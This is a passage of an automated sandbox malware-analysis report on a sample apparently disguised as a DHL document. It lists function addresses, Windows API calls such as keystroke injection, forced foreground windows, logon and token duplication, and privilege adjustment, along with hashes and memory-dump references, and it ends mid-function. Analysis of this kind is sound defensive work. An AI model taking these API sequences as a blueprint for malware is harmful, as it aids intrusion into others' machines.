Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: d6336db541ff7d66c6c3f37d936961023c9d9317fea76cbb03a445c41efcebf8
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: E2F0F936611A20A6C6313A679C05BDB33989F62338FD0071FF821922D2DB7C948285AD

Function 003F9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 003F9CBD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction ID: c2d11b020278db885aeabfee37e863a9c0e94144a57a5bdf8a2a524053a5c941
Opcode Fuzzy Hash: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction Fuzzy Hash: 5DF0F4B22006046ED7219F29C802BA6BB98EB84760F10853FFA19CB5D1DB35E45486A4

Function 00424C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,003F1129,00000000,?,00422E29,00000001,00000364,?,?,?,0041F2DE,00423863,004C1444,?,0040FDF5,?), ref: 00424CBE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ae0cfb8d460c7452d14d27c24fc40a82999089a9b1966282effc371482bd7829
Instruction ID: 481b8a76f8ebd0726c1620381c01897e6a32763c8268bfc426008805032caf7f
Opcode Fuzzy Hash: ae0cfb8d460c7452d14d27c24fc40a82999089a9b1966282effc371482bd7829
Instruction Fuzzy Hash: 38F0B43170223467DB215F6BBC09B9B3788EFC17A4B564127B819A73D1CB79D80286AC

Function 00423820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6,?,003F1129), ref: 00423852

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e47686cac375aee37fb6717ffe37416794123936ba12cb01dc2fc74281a225f4
Instruction ID: c082febc26968f9271e9f87bf8f1d85995961c632468083047aa9a919ea7aad5
Opcode Fuzzy Hash: e47686cac375aee37fb6717ffe37416794123936ba12cb01dc2fc74281a225f4
Instruction Fuzzy Hash: 32E0A73230023456D6213E67BC04B9B36E9AB42BF6B550027BD059A6D1CB2DDD0245AD

Function 003F4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4F6D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: f0e73bc6dfee550889757df8e27d5d3347318757465732d7f0b8e96319b8cc06
Instruction ID: 730a743a23cd5328075d42e7c2cf07edb240f1bde0f2bc1607aec5310534251d
Opcode Fuzzy Hash: f0e73bc6dfee550889757df8e27d5d3347318757465732d7f0b8e96319b8cc06
Instruction Fuzzy Hash: D2F03971505756CFDB369F65E494827BBE4AF14329321897EE2EE82A21CB319888DF10

Function 0045CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0043EE51,004B3630,00000002), ref: 0045CD26

Part of subcall function 0045CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0045CD19,?,?,?), ref: 0045CC59
Part of subcall function 0045CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0045CD19,?,?,?,?,0043EE51,004B3630,00000002), ref: 0045CC6E
Part of subcall function 0045CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0045CD19,?,?,?,?,0043EE51,004B3630,00000002), ref: 0045CC7A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: e48cd34bec87464087847e0e8252bffccbfa02b2b03af9de35e653c8555e6080
Instruction ID: 0d536fe0a369b6662b86c66f2e83b07d1ccf1788806e968b5299db7727ab1b76
Opcode Fuzzy Hash: e48cd34bec87464087847e0e8252bffccbfa02b2b03af9de35e653c8555e6080
Instruction Fuzzy Hash: 75E06576400704EFC7219F46DD8089BBBF8FF84751710852FE955C2111D775AA14DFA0

Function 003F2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003F2DC4

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: bfc7144cba22afa4d10cc29b016370bb63ef9425329517520c7c1f7a1f621bb0
Instruction ID: 86f84363ddd292d969d236cdcdcd2105cb0b7f9d98f39792dfc7ffceee67c1d0
Opcode Fuzzy Hash: bfc7144cba22afa4d10cc29b016370bb63ef9425329517520c7c1f7a1f621bb0
Instruction Fuzzy Hash: E8E0CD72A001245BC711A2599C06FEA77DDDFC8790F0400B5FD09D7258D974AD808654

Function 003F2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003F3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003F3908

Part of subcall function 003FD730: GetInputState.USER32 ref: 003FD807

SetCurrentDirectoryW.KERNEL32(?), ref: 003F2B6B

Part of subcall function 003F30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003F314E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: be421bbd41c0a4f79e074b13be1876bbba6d36016cdc9eb47631a0d1b8df087c
Instruction ID: 4ab26b05608988dafcf4a0256790ff4c262fcd72a1929b3a555594ba0161244c
Opcode Fuzzy Hash: be421bbd41c0a4f79e074b13be1876bbba6d36016cdc9eb47631a0d1b8df087c
Instruction Fuzzy Hash: 51E0863130424D06C60ABB759856A7DA759DBD2352F40153FF7464B163CF2489494356

Function 0043039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00430704,?,?,00000000,?,00430704,00000000,0000000C), ref: 004303B7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6a6fc04cf4828178c2204c10cf304cbe6646b1b9493a252b912170b3f24217c7
Instruction ID: d8207d25fba0f6e373fad7f4ce4beb1bb1fc988c68a86d93079d3847a9d8459d
Opcode Fuzzy Hash: 6a6fc04cf4828178c2204c10cf304cbe6646b1b9493a252b912170b3f24217c7
Instruction Fuzzy Hash: 6CD06C3204010DBBDF028F84DD86EDA3BAAFB48714F014010BE1856020C732E821AB94

Function 003F1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 003F1CBC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: cb097745c172409f9c24ed381dda0df50bad7b56495c39a588a566205fd0aee3
Instruction ID: 32d945c50b8637ebd5a6344e7a18b3783812a0b046941af8aecc4f4b7364a3f9
Opcode Fuzzy Hash: cb097745c172409f9c24ed381dda0df50bad7b56495c39a588a566205fd0aee3
Instruction Fuzzy Hash: 98C09B35280314BFF6545780BD4AF157754A348B04F044411FA09555F3C3F11410D758

Function 0046744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 003F5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,003F949C,?,00008000), ref: 003F5773

GetLastError.KERNEL32(00000002,00000000), ref: 004676DE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 06e43fec2477fa6e790f899b3855b877c47c6f66fbd0397b836dd775e67095b1
Instruction ID: 36c8845231b9cfb9188ca452e80347dd9c25cb510e893db090a0067b13143edb
Opcode Fuzzy Hash: 06e43fec2477fa6e790f899b3855b877c47c6f66fbd0397b836dd775e67095b1
Instruction Fuzzy Hash: 9881D4302087059FC715EF28C491B6AB7E1BF89314F04456EF9865B3A2EB34ED45CB96

Function 003F6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,004324E0), ref: 003F6266

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a89194fa83b4488e100020489a04b2cd7d6c196e597feef6424235a303e49fe3
Instruction ID: 2c12555735de6f4decfddc60c29cc115a15eabfc26f1db7dcc53ee20c56c7749
Opcode Fuzzy Hash: a89194fa83b4488e100020489a04b2cd7d6c196e597feef6424235a303e49fe3
Instruction Fuzzy Hash: 40E0B675400B01DFC3324F1AE815422FBF9FFE13613214E2ED5E592660D7B058869F50

Function 01186180 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01186191

Memory Dump Source

Source File: 00000000.00000002.1268632520.0000000001183000.00000040.00000020.00020000.00000000.sdmp, Offset: 01183000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1183000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: b8da682ab308149123945eb6bece87193436e446644dc052da7b817c2006a5ce
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 33E0BF7498010D9FDB00EFA4D54969E7BB4EF04302F104161FD0192281D73199508A62

Non-executed Functions

Function 00489576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0048969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004896C9
SendMessageW.USER32 ref: 004896F2
GetKeyState.USER32(00000011), ref: 0048978B
GetKeyState.USER32(00000009), ref: 00489798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004897AE
GetKeyState.USER32(00000010), ref: 004897B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004897E9
SendMessageW.USER32 ref: 00489810
SendMessageW.USER32(?,00001030,?,00487E95), ref: 00489918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00489941
SetCapture.USER32(?), ref: 0048994A
ClientToScreen.USER32(?,?), ref: 004899AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004899BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004899D6
ReleaseCapture.USER32 ref: 004899E1
GetCursorPos.USER32(?), ref: 00489A19
ScreenToClient.USER32(?,?), ref: 00489A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00489A80
SendMessageW.USER32 ref: 00489AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00489AEB
SendMessageW.USER32 ref: 00489B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00489B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00489B4A
GetCursorPos.USER32(?), ref: 00489B68
ScreenToClient.USER32(?,?), ref: 00489B75
GetParent.USER32(?), ref: 00489B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00489BFA
SendMessageW.USER32 ref: 00489C2B
ClientToScreen.USER32(?,?), ref: 00489C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00489CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00489CDE
SendMessageW.USER32 ref: 00489D01
ClientToScreen.USER32(?,?), ref: 00489D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00489D82

Part of subcall function 00409944: GetWindowLongW.USER32(?,000000EB), ref: 00409952

GetWindowLongW.USER32(?,000000F0), ref: 00489E05

Strings

F, xrefs: 00489D07
@GUI_DRAGID, xrefs: 0048997D
p#L, xrefs: 00489990

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#L
API String ID: 3429851547-2489550902
Opcode ID: 5c4092eb4138fbc5d00754ac752019c38c67b4070dd48b959b2e095b5e913d2b
Instruction ID: f633a265bba9722d2351badf29d24c3c239b6685b30b448ce8d0fba5898ddef3
Opcode Fuzzy Hash: 5c4092eb4138fbc5d00754ac752019c38c67b4070dd48b959b2e095b5e913d2b
Instruction Fuzzy Hash: 36427B74204601AFD725EF24CC84EBEBBE5EF49310F180A2EF659972A1E735AC50CB59

Function 00484873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004848F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00484908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00484927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0048494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0048495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0048497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004849AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004849D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00484A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00484A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00484A7E
IsMenu.USER32(?), ref: 00484A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00484AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00484B20
GetWindowLongW.USER32(?,000000F0), ref: 00484B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00484BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00484C82
wsprintfW.USER32 ref: 00484CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00484CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00484CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00484D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00484D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00484D5A

Strings

%d/%02d/%02d, xrefs: 00484CA8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: b37b9fd66bcc6b03af652eea69a97aca717bbdf38406467f4ca76dbc1e8f06d3
Instruction ID: 7fe0079997798d8a31590167c5497605e83a0aa2859e9ae0cde8744b56a6c5ef
Opcode Fuzzy Hash: b37b9fd66bcc6b03af652eea69a97aca717bbdf38406467f4ca76dbc1e8f06d3
Instruction Fuzzy Hash: EC120171500255ABEB25AF24CC49FAF7BF8AF85300F10492EFA15EB2E1D7789941CB58

Function 0040F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0040F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044F474
IsIconic.USER32(00000000), ref: 0044F47D
ShowWindow.USER32(00000000,00000009), ref: 0044F48A
SetForegroundWindow.USER32(00000000), ref: 0044F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0044F4AA
GetCurrentThreadId.KERNEL32 ref: 0044F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0044F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0044F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0044F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0044F4DE
SetForegroundWindow.USER32(00000000), ref: 0044F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0044F4F6
keybd_event.USER32(00000012,00000000), ref: 0044F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0044F50B
keybd_event.USER32(00000012,00000000), ref: 0044F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0044F519
keybd_event.USER32(00000012,00000000), ref: 0044F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0044F528
keybd_event.USER32(00000012,00000000), ref: 0044F52D
SetForegroundWindow.USER32(00000000), ref: 0044F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0044F557

Strings

Shell_TrayWnd, xrefs: 0044F46F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 8d8e68f77f8b3d2c62c95da8fbfebde7aa887a1c04bcdc22de93cd4745deb967
Instruction ID: c52cb7260694c843876bb6d7bdde4087a795f10093468c38476cc509c5c90d5e
Opcode Fuzzy Hash: 8d8e68f77f8b3d2c62c95da8fbfebde7aa887a1c04bcdc22de93cd4745deb967
Instruction Fuzzy Hash: 10315271A40228BBFB206BB55C8AFBF7E6CEB44B50F10043AF601E61D1D6B45D00AB79

Function 00451201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 004516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045170D
Part of subcall function 004516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0045173A
Part of subcall function 004516C3: GetLastError.KERNEL32 ref: 0045174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00451286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004512A8
CloseHandle.KERNEL32(?), ref: 004512B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004512D1
